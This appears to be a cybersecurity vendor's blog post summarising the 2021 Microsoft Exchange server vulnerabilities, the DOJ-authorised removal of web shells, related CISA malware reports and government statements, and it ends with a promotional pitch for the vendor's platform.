Countering Microsoft Exchange Vulnerabilities: DOJ Authorizes Warrant to Address Cybercrime Against Americans
Federal Government Moving Quickly to Respond to Emerging Threats to Vital Digital Infrastructure
- MAR-10331466-1.v1: China Chopper Webshell identifies a China Chopper webshell observed in post-compromised Microsoft Exchange Servers. After successfully exploiting a Microsoft Exchange Server vulnerability for initial accesses, a malicious cyber actor can upload a webshell to enable remote administration of the affected system.
- MAR-10330097-1.v1: DearCry Ransomware identifies ransomware that has been used to exploit compromised on-premises Exchange servers. The malware encrypts files on a device and demands a ransom in exchange for decryption.
- CISA web page Remediating Microsoft Exchange Vulnerabilities
- CISA web page Ransomware Guidance and Resources

The 2021 Microsoft Exchange Vulnerabilities: What Happened and Why It Matters For Your Organization
Microsoft Exchange server vulnerabilities have been an important cybersecurity topic since employees at network security monitoring service Volexity detected anomalous and potentially malicious behaviors being carried out across two of its customers’ Microsoft Exchange servers on January 3rd, 2021. By March 2nd, 2021, Microsoft confirmed the existence of zero-day exploits carried out across its on-premise Microsoft Exchange servers in the United States. As of March 9th, 2021, more than 250,000 organizations across the United States had been targeted by cybercriminals as fallout to the massive data breach caused by the vulnerabilities discovered in January. In March, Microsoft released an Exchange server vulnerability mitigation guide and released a one-click mitigation tool. Following the January 2021 Microsoft Exchange Databreach state and non-state actors in the global hacking syndicates’ HAFNIUM, Winniti Group, Calypso, Tick, and LuckyMouse (APT27) capitalized on the moment to unleash a series of crimeware variants, including previously unknown ransomware classes. These attacks were not limited to private companies and encompassed public organizations such as the European Banking Authority, Norwegian Parliament, and the Chilean Commission for Financial Markets (CMF). The most recent Microsoft Exchange vulnerabilities identified by the NSA, classified by the CISA, addressed with warrants by the DOJ, and directly mitigated by the FBI. These actions were not previously targeted by advanced persistent threat (APT) actors—as the previous vulnerabilities CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 had been—federal action of this magnitude signifies the pervasive threat these new potential exploit vectors posed to U.S. national interests. “Today’s court-authorized removal of the malicious web shells demonstrates the Department’s commitment to disrupt hacking activity using all of our legal tools, not just prosecutions,” said Assistant Attorney General John C. Demers for the Justice Department’s National Security Division. “Combined with the private sector’s and other government agencies’ efforts to date, including the release of detection tools and patches, we are together showing the strength that public-private partnership brings to our country’s cybersecurity. There’s no doubt that more work remains to be done, but let there also be no doubt that the Department is committed to playing its integral and necessary role in such efforts.”How Should Organizations Respond to the 2021 Microsoft Exchange Data Breach and Vulnerabilities?
Any organization that has utilized on-premise Microsoft Exchange servers is recommended to immediately complete security updates to address the vulnerabilities discovered in January: The most recent Microsoft Exchange vulnerabilities uncovered by NSA have not been used in cybercrime exploit attempts. Nonetheless, organizations seeking to gain more information about the ongoing and evolving cybercrime event are recommended to review the following resources for additional information: Microsoft April 2021 Security Update Summary Deployment InformationCISA ED 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities Supplemental Direction V2 CISA Alert AA21-062A: Mitigate Microsoft Exchange Server Vulnerabilities CISA web page: Remediating Microsoft Exchange Vulnerabilities
Geopolitical Implications of Government Actions Against Microsoft Exchange Vulnerabilities
This latest cyber threat event involving Microsoft Exchange has a variety of geopolitical implications. That’s because many hackers connected to ongoing exploit attempts have been confirmed to be connected to threat groups based in Russia and China, among other nations with adversarial relationships against U.S. national interests. The Computer Crime and Intellectual Property Section of the United States Department of Justice has been very active over the last few years and has taken many actions towards prosecuting foreign nationals involved with unleashing cybercrime against the United States. Deputy National Security Advisor for Cyber & Emerging Technologies Anne Neuberger released the following statement outlining the U.S. government’s commitment to countering cyberespionage and cyberwarfare attempts being carried out against U.S. citizens: Cybersecurity is a top priority for the Biden Administration, and we’re committed to sharing actionable and timely information to help the American public operate safely online. Microsoft released a set of Exchange patches today that are critical. We urge all owners and operators of Microsoft Exchange Servers to apply these latest patches immediately. The U.S. Government will lead by example – we require all agencies to patch their Exchange servers immediately. Should these vulnerabilities evolve into a major incident, we will manage the incident in partnership with the private sector, building on the Unified Coordination Group processes established and exercised in the recent Microsoft Exchange incident. The U.S. government discovered and notified Microsoft of these vulnerabilities. The U.S. Government carefully weighs the national security, public, and commercial interests in deciding to disclose a vulnerability. Moreover, we recognize when vulnerabilities may pose such a systemic risk that they require expedited disclosure. This disclosure is an example of the responsible and transparent approach the U.S. government uses when handling vulnerabilities. This is consistent with our expectations for how responsible governments and companies can work together to promote cybersecurity.Coordination is Key to Developing a Resilient Cybersecurity Posture
Protecting mission-critical digital infrastructure has far-reaching implications. In light of recent data breaches, ransomware attacks, and ongoing exploit attempts against public and private sector organizations, it’s clear that it is time for organizations worldwide to adopt a more resilient cybersecurity posture. Building agile and responsive cybersecurity threat response capabilities means developing partnerships with expert analysts and proprietary technologies that go further and see farther. Gradient is your trusted cybersecurity partner. Our platform is your best resource for understanding and better responding to the emerging cyber threats of the day with the expertise of a true information security expert. Our team of analysts and cybersecurity professionals becomes an extension of your IT capabilities and the foundation of a resilient and responsive cybersecurity posture. Don’t wait until it's too late and your organization is targeted. Respond to emerging threats now. Schedule a demo today to learn more about the next generation of cybersecurity.